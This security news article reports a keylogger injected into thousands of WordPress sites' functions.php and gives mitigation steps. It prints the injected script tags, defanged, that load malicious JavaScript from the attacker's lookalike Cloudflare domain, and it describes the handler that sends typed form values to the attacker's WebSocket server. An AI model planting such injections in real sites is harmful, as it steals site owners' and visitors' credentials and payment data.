Thursday, February 13, 2025
HomePassword AttacksBeware!! Keylogger Discovered in more than 5,000 WordPress Websites

Beware!! Keylogger Discovered in more than 5,000 WordPress Websites

Published on

SIEM as a Service

Follow Us on Google News

New research revealed that more than 5,000 WordPress websites are running along with keylogger and also it’s trying to running crypto-miner in the browser while browsing the infected website.

Recent days WordPress websites displaying unwanted banners at the bottom of the page which appears 15 seconds after browsing the website due to injecting  the Cloudflare[.]solutions Scripts in function.php. that does not belong to Cloudflare.

<script type='text/javascript' src='hxxp://cloudflare[.]solutions/ajax/libs/reconnecting-websocket/1.0.0/reconnecting-websocket.js'></script>

<script type='text/javascript' src='hxxp://cloudflare[.]solutions/ajax/libs/cors/cors.js'></script>

It used to load this malicious script every time admin pannel logged in both front end and backend.

Also Read:  WordPress 4.8.3 released with patch for SQL injection (SQLi) which affected all the previous version

In this case, the second  script contains cors.js which is injected in an encoded format and once it decoded we can see that there are a two cdnjs.cloudflare.com URLs with long hexadecimal parameters:

A domain name seems to be original Cloudfare URL but when we come down analyzing the https://cdnjs.cloudflare.com/ajax/libs/linter/linter.js ,it contains linterkey variables.

Further, analyze revealed that linter.js contains a real Payload in hexadecimal numbers after the question mark in the URLs.

According to sucuri, This script adds a handler to every input field on the websites to send its value to the attacker (wss://cloudflare[.]solutions:8085/) when a user leaves that field.

This Payload has capable of performing the keylogging activities each and every time admin logging on their WordPress website.

Here using this WordPress Keylogger, both the username and the password were sent to the cloudflare[.]solutions server even before a user clicks on the “Login” button.

The Same portion of this first attack and the second attack took place in April and November month and this is the latest scenario that is capable these stately keylogging futures.

The worst part is if this flow has successfully executed in e-commerce based WordPress website then the hacker can able to access the payment related information.

Also Read: Most Important Considerations Check to Setup Your WordPress Security

Mitigation steps for this WordPress Keylogger

  • Performing the Proper Pentesing for WordPress Website – Pentesting Checklist
  • As we already mentioned, the malicious code resides in the function.php file of the WordPress theme. You should remove the add_js_scripts function and all the add_action clauses that mention add_js_scripts.
  • Given the keylogger functionality of this malware, you should consider all WordPress passwords compromised so the next mandatory step of the cleanup is changing the passwords (actually it is highly recommended after any site hack).
  • Don’t forget to check your site for other infections too. Many sites with the Cloudflare.solutions malware also have injected coinhive cryptocurrency miner scripts.
Balaji
Balaji
BALAJI is an Ex-Security Researcher (Threat Research Labs) at Comodo Cybersecurity. Editor-in-Chief & Co-Founder - Cyber Security News & GBHackers On Security.

Latest articles

Palo Alto PAN-OS Zero-Day Flaw Allows Attackers to Bypass Web Interface Authentication

Palo Alto Networks has disclosed a zero-day vulnerability in its PAN-OS software (CVE-2025-0108), allowing...

Enhancing Threat Detection With Improved Metadata & MITRE ATT&CK tags

The cybersecurity landscape continues to evolve rapidly, demanding more sophisticated tools and methodologies to...

Hackers Exploit Ivanti Connect Secure Vulnerability to Inject SPAWNCHIMERA malware

In a concerning development, cybersecurity experts have identified active exploitation of a critical vulnerability...

ZeroLogon Ransomware Exploits Windows AD to Hijack Domain Controller Access

A newly intensified wave of ransomware attacks has surfaced, leveraging the infamous ZeroLogon vulnerability...

Supply Chain Attack Prevention

Free Webinar - Supply Chain Attack Prevention

Recent attacks like Polyfill[.]io show how compromised third-party components become backdoors for hackers. PCI DSS 4.0’s Requirement 6.4.3 mandates stricter browser script controls, while Requirement 12.8 focuses on securing third-party providers.

Join Vivekanand Gopalan (VP of Products – Indusface) and Phani Deepak Akella (VP of Marketing – Indusface) as they break down these compliance requirements and share strategies to protect your applications from supply chain attacks.

Discussion points

Meeting PCI DSS 4.0 mandates.
Blocking malicious components and unauthorized JavaScript execution.
PIdentifying attack surfaces from third-party dependencies.
Preventing man-in-the-browser attacks with proactive monitoring.

More like this

10,000 WordPress Websites Hacked to Distributing MacOS and Microsoft Malware

Over 10,000 WordPress websites have been hijacked to deliver malicious software targeting both macOS...

WordPress Plugin Vulnerability Exposes 23k+ Websites to Hacking

Researchers from Patchstack have warned that over 23,000 real estate websites using the popular...

Credit Card Skimmer Hits WordPress Checkout Pages, Stealing Payment Data

Researchers analyzed a new stealthy credit card skimmer that targets WordPress checkout pages by...